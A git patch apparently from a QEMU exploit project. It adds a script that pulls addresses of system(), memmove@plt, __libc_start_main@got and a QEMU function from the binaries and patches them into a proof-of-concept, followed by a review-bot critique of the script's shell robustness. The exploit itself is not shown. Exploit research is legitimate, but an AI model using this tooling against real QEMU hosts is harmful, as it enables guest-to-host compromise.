From 309c95981c1123074b6645933cb51bc7d579dd8a Mon Sep 17 00:00:00 2001
From: stong
Date: Sat, 16 May 2026 05:03:00 +0900
Subject: [PATCH] EVEN MORE UISER FRIENDLY!!!
---
qemu/README.md | 5 ++++
qemu/update_poc_offsets.sh | 51 ++++++++++++++++++++++++++++++++++++++
2 files changed, 56 insertions(+)
create mode 100755 qemu/update_poc_offsets.sh
diff --git a/qemu/README.md b/qemu/README.md
index 115713a..4b53628 100644
--- a/qemu/README.md
+++ b/qemu/README.md
@@ -35,6 +35,10 @@ QEMU + Mutiny. ## Offsets (USER FRIENDLY VERSION) +``` +./update_poc_offsets.sh +``` + - Replace `0x047E735` with `$(readelf -s qemu-system-x86_64 | grep cmd_logs_get_log | awk '{print $2}')` - Replace `0x0341BB0` with `$(objdump -S qemu-system-x86_64 | grep ":" | awk '{print $1}')` - Replace `0x01E72FF8` with `$(objdump -S qemu-system-x86_64 | grep "libc_start_main" | awk '{print $(NF-1)}')`
@@ -45,6 +49,7 @@ QEMU + Mutiny. ## Building ``` +./update_poc_offsets.sh gcc -O2 -Wall -Wextra -o exp poc.c ```
diff --git a/qemu/update_poc_offsets.sh b/qemu/update_poc_offsets.sh
new file mode 100755
index 0000000..ff6cd2f
--- /dev/null
+++ b/qemu/update_poc_offsets.sh
@@ -0,0 +1,51 @@
+#!/bin/sh
+set -eu
+
+POC=${1:-poc.c}
+
+echo "[*] finding cmd_logs_get_log..."
+cmd_logs_get_log=$(readelf -s qemu-system-x86_64 | grep cmd_logs_get_log | awk '{print $2}')
+echo "[+] cmd_logs_get_log: $(printf '0x%s' "$cmd_logs_get_log")"
+
+echo "[*] finding memmove@plt..."
+memmove_plt=$(objdump -S -j .plt.sec qemu-system-x86_64 | grep ":" | awk '{print $1}')
+echo "[+] memmove@plt: $(printf '0x%s' "$memmove_plt")"
+
+echo "[*] finding __libc_start_main@got..."
+libc_start_main_got=$(objdump -S qemu-system-x86_64 | grep "libc_start_main" | awk '{print $(NF-1)}')
+echo "[+] __libc_start_main@got: $(printf '0x%s' "$libc_start_main_got")"
+
+echo "[*] finding libc..."
+libc_line=$(ldd ./qemu-system-x86_64 | grep libc.so | awk '{print $3}')
+echo "[+] libc: $libc_line"
+
+echo "[*] finding __libc_start_main..."
+libc_start_main=$(readelf -sW $libc_line | grep -i __libc_start_main | awk '{print $2}')
+echo "[+] __libc_start_main: $(printf '0x%s' "$libc_start_main")"
+
+echo "[*] finding system..."
+system=$(readelf -sW $libc_line | grep -i system@ | awk '{print $2}')
+echo "[+] system: $(printf '0x%s' "$system")"
+
+hexlit()
+{
+ printf '0x%s\n' "$1"
+}
+
+replace()
+{
+ old=$1
+ new=$2
+
+ tmp="$POC.tmp.$$"
+ sed "s/$old/$new/g" "$POC" > "$tmp"
+ mv "$tmp" "$POC"
+}
+
+echo "[*] updating $POC..."
+replace 047E735 $cmd_logs_get_log
+replace 0341BB0 $memmove_plt
+replace 01E72FF8 $libc_start_main_got
+replace 2A200 $libc_start_main
+replace 058750 $system
+echo "[+] done"
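Review bot: The values spliced into `sed "s/$old/$new/g"` inside `replace` are never checked to be a single hex token: `objdump -S -j .plt.sec … | grep ":"` matches every line containing a colon, so `memmove_plt` can hold several addresses, and because a pipeline's status is that of its last command (`awk`), a `grep` with no match leaves the variable empty without tripping `set -e`, so `poc.c` is rewritten with a wrong value or not at all and the script still reports `[+] done`. The call sites pass the values unquoted (`replace 047E735 $cmd_logs_get_log`), which hides the multi-line case by word-splitting it, and `$libc_line` is likewise unquoted in the two `readelf -sW` lines. The substitution is also not repeatable: once `047E735` has been replaced, a second run (which the README now tells the user to do before every `gcc`) finds no match silently, so `replace` should fail when the old literal is absent. Quote every value at the call sites and add the validation below to `replace`; `hexlit` is defined but never used and can be dropped.
```shell
replace()
{
    old=$1
    new=$2
    # refuse anything that is not one bare hex token (empty, multi-line, stray text)
    case $new in
        ''|*[!0-9A-Fa-f]*)
            printf '[-] bad offset for %s: "%s"\n' "$old" "$new" >&2
            exit 1 ;;
    esac
    # the literal is consumed on the first run, so "not found" means a stale or already-updated file
    grep -q -- "$old" "$POC" || { printf '[-] %s not found in %s\n' "$old" "$POC" >&2; exit 1; }
    # … unchanged: tmp file, sed substitution, mv into place …
}

replace 047E735 "$cmd_logs_get_log"
# … unchanged: the remaining replace calls, each value quoted the same way …
```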